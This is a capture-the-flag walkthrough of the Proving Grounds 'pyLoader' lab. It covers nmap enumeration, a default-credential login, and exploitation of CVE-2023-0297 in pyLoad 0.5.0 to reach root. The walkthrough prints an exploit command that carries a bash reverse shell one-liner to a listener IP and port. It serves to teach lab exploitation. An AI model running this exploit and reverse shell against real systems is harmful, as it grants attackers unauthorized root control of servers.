PG - pyLoader

PG – pyLoader

In this walk through, we will be going through the pyLoader room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of exploitation of pyLoad via CVE-2023-0297 to get root on the target. So, let’s get started without any delay.

pyLoader

Machine Info:

TitlepyLoader
IPaddress192.168.169.29
DifficultyIntermediate
OSLinux
DescriptionpyLoader is an Intermediate Linux machine which is vulnerable to CVE-2023-0297 and requires its exploitation to get root.

Enumeration:

  • I started off with a regular aggressive nmap scan and found only two ports opened – 22 (SSH) and 9666 (HTTP).

$ sudo nmap -A 192.168.236.26
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-07 20:54 IST

Nmap scan report for 192.168.236.26
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
9666/tcp open     http    CherryPy wsgiserver
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Cheroot/8.6.0
| http-title: Login - pyLoad 
|_Requested resource was /login?next=http://192.168.236.26:9666/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/7%OT=22%CT=1%CU=35039%PV=Y%DS=4%DC=T%G=Y%TM=65C3A0F9
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=2%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP=10
OS:2%GCD=1%ISR=10A%TI=Z%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11
OS:NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE8
OS:8%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)
OS:T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T5(R=N)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=8522%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   201.36 ms 192.168.45.1
2   201.36 ms 192.168.45.254
3   202.21 ms 192.168.251.1
4   202.27 ms 192.168.236.26

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.58 seconds

nmap scan

  • Enumerated the web server running on port 9666. Found out that the pyLoad application was running on it and has a login panel in the home page.

pyLoad application

  • Used the default username and password combo to log into the PyLoad backend successfully. Enumerated the pyLoad running version – 0.5.0

PG - pyLoader

pyLoad information

Exploitation & Getting root:

  • Looked for any known exploits for concerned application version and found out that it is vulnerable to CVE-2023-0297 which is a Pre-Auth RCE vulnerability.

searchsploit pyload

searchsploit pyload

  • Used the below exploit on the target specifying the target host and port number along with the command to executed which was the bash reverse shell one liner along with our listening IP and port. Once the execution is completed, we will receive a connection back at our netcat listener as root.

Exploithttps://github.com/JacobEbben/CVE-2023-0297

python3 exploit.py -t 192.168.236.26:9666 -c 'bash -i >& /dev/tcp/192.168.45.215/4444 0>&1' -I 192.168.45.215 -P 4444

firing exploit

got root

  • Captured the root flag and marked the machine as complete.

proof flag

Also Read: PG – Plum

Conclusion:

Conclusion

So that was “pyLoader” for you. We started off with a regular nmap scan and found two ports opened – 22 (SSH) and 9666 (HTTP). Enumerated the web server running on port 9666 and found pyLoad running. Used the default username and password combo to log into the PyLoad backend successfully. In there, found out that it is running the version 0.5.0. Looked for any known exploit and found it is vulnerable to CVE-2023-0297. At last, used the same to get root on the target. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top